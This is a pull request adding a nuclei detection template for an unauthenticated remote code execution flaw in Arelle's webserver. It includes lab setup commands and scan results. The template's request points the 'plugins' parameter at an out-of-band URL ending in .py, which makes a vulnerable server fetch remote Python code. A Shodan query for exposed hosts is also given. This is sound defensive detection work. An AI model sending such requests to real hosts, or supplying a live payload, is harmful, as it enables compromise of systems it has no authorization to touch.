### PR TITLE
Add CVE-2026-42796 - Arelle < 2.39.10 - Unauthenticated Remote Code Execution

### DIFF
--- a/http/cves/2026/CVE-2026-42796.yaml
+++ b/http/cves/2026/CVE-2026-42796.yaml
@@ -1,0 +1,50 @@
+id: CVE-2026-42796
+
+info:
+  name: Arelle < 2.39.10 - Unauthenticated Remote Code Execution
+  author: aryu-ru
+  severity: critical
+  description: |
+    Arelle before 2.39.10 contains an unauthenticated remote code execution vulnerability in the webserver's /rest/configure endpoint. The plugins query parameter is forwarded to the plugin manager without authentication, allowing an attacker to supply a URL to a remote Python file that Arelle downloads and executes within its process.
+  impact: |
+    Successful exploitation allows an unauthenticated attacker to execute arbitrary Python code with the privileges of the Arelle webserver process, leading to full host compromise.
+  remediation: |
+    Upgrade to Arelle 2.39.10 or later, which rejects remote URL plug-in references over the webserver.
+  reference:
+    - https://www.vulncheck.com/advisories/arelle-unauthenticated-rce-via-rest-configure
+    - https://github.com/Arelle/Arelle/pull/2320
+    - https://github.com/Arelle/Arelle/releases/tag/2.39.10
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-42796
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-42796
+    cwe-id: CWE-306
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: arelle
+    product: arelle
+    shodan-query: http.html:"Arelle Web Services"
+  tags: cve,cve2026,arelle,rce,oast,unauth
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/rest/configure?plugins=http://{{interactsh-url}}/{{randstr}}.py"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+      - type: word
+        part: body
+        words:
+          - "Configuration Request"
+
+      - type: status
+        status:
+          - 200

--- a/http/cves/2026/CVE-2026-42796.yaml
+++ b/http/cves/2026/CVE-2026-42796.yaml
@@ -1,7 +1,7 @@
 id: CVE-2026-42796
 
 info:
-  name: Arelle < 2.39.10 - Unauthenticated Remote Code Execution
+  name: Arelle < 2.39.10 - Remote Code Execution
   author: aryu-ru
   severity: critical
   description: |


### PR DESCRIPTION
Adds a nuclei template for the unauthenticated remote code execution vulnerability in Arelle's built-in webserver (CVE-2026-42796). The `/rest/configure` endpoint forwards the `plugins` query parameter to the plugin manager without any authentication; supplying a URL causes Arelle to download and execute a remote Python plugin inside its process. The template proves the flaw out-of-band by pointing `plugins` at an interactsh URL and matching the resulting server-side HTTP interaction together with the endpoint's `Configuration Request` response, so detection is version-independent and never relies on a version banner.

### PR Information

- Added CVE-2026-42796
- Vulnerable endpoint: `/rest/configure`
- Vulnerable parameter: `plugins` (accepts a remote `http(s)://` URL that is loaded as a plug-in)
- Affected versions: Arelle < 2.39.10
- Remediation: upgrade to Arelle 2.39.10+, which rejects remote URL plug-in references over the webserver (`_rejectRemotePlugins`, PR #2320)
- References:
    - https://www.vulncheck.com/advisories/arelle-unauthenticated-rce-via-rest-configure
    - https://github.com/Arelle/Arelle/pull/2320
    - https://github.com/Arelle/Arelle/releases/tag/2.39.10
    - https://nvd.nist.gov/vuln/detail/CVE-2026-42796

Classification: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` (9.8, CWE-306) · Shodan: `http.html:"Arelle Web Services"`

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

No vulnerable Docker image is published, so the labs were built from the official PyPI release:

```
# vulnerable
docker run -d -p 8080:8080 python:3.12-slim \
  sh -c "pip install arelle-release==2.39.9 && arelleCmdLine --webserver 0.0.0.0:8080"
# patched
docker run -d -p 8081:8081 python:3.12-slim \
  sh -c "pip install arelle-release==2.39.10 && arelleCmdLine --webserver 0.0.0.0:8081"
```

#### Additional Details

True positive — vulnerable 2.39.9:

```
$ nuclei -duc -t CVE-2026-42796.yaml -u http://127.0.0.1:8080
[CVE-2026-42796] [http] [critical] http://127.0.0.1:8080/rest/configure?plugins=http://<oob>.oast.fun/<rand>.py
[INF] Scan completed. 1 matches found.

# interactsh received the server-side fetch from the target (the RCE primitive):
[<oob>] Received HTTP interaction from <redacted>
GET /<rand>.py HTTP/1.1
```

False positive check — patched 2.39.10 (`Matched: 0`; endpoint rejects the remote plug-in):

```
$ nuclei -duc -t CVE-2026-42796.yaml -u http://127.0.0.1:8081
Matched: 0

# raw patched response:
HTTP/1.0 400 Bad Request
Remote URL plug-in references are not permitted via the webserver: http://.../<rand>.py
```

A generic non-Arelle HTTP server (nginx) was also tested and did not match.
